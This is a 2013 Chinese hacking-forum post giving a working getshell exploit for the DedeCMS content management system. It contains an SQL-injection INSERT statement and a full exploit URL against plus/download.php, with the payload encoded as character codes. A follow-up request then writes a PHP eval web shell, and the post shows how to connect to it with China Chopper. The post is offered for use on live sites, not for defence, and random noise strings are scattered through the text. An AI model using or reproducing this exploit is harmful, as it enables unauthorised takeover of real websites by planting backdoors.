找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2435|回复: 0
打印 上一主题 下一主题

dedecms漏洞getshell EXP最新

[复制链接]
跳转到指定楼层
楼主
发表于 2013-6-10 16:49:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 土豆 于 2013-6-10 14:41 编辑 ' `+ X* f6 i$ [% s

1 L4 M' C; V& E9 }- T$ Z$ [) D  _3 |" n
作者:鬼哥
  G3 w. ~4 o9 q2 R1 W* w
1 P: G7 V3 Q$ Q看贴不回,没JJ* a4 k/ b3 |$ l3 X
+ r# d5 t7 {' S- R$ h  [: k# _
漏洞大家都知道是哪个。
: d- D' `: H& A8 \; W9 o
! e2 A( i. T$ W, y4 t其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。* a' i8 V* w4 @
" y0 m+ K1 p( p9 S
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
) C5 O- Y$ Q2 A  g, c& r
% x! [% t0 B, t' v6 G刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?4 u" Y* f5 m/ H% @
* Z' q' a/ r  T9 [# ^  g2 N: Z$ p
getshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。
0 i* N7 l6 _: [; M0 O7 F) I9 M* b9 T5 ~  w0 b
但是测试了下。。失败
9 w6 Q5 \. C4 }' U3 |
% @! y; R3 |  I7 B& I* ]1 M原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
1 u: B% c' J  [; A8 j+ f# ]7 R* \8 e
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`3 a2 j% D& [0 p' A* _$ T- W, B. v, ]
7 @3 L6 R2 x: _% R( {& O7 x
EXP:
1 B9 u! i) _+ I+ U5 `# `
- C/ E' }" U. q" J! dhttp://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
" \- G/ p" [2 u) o
  l* w' A) C) |/ R( W( r5 ~6 O- ?' W
成功增加。
3 O+ x1 T  T" v% [
/ u$ _! p' W7 A) O" D6 e访问http://www.xxx.com/plus/mytag_js.php?aid=9013
& I9 m; f7 D# \1 |0 y生成一句话木马.  W! j" y& U( Z, `5 J: @
菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige
# T4 Y7 R. r3 Q# ]/ F! e4 L/ k& P
/ z1 u- k0 A! X测试OK。
# a% ^* E9 I6 e: Q4 K  T
+ v1 B" p) S7 v- _) t# _0 g
* J( K, J" ?3 c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表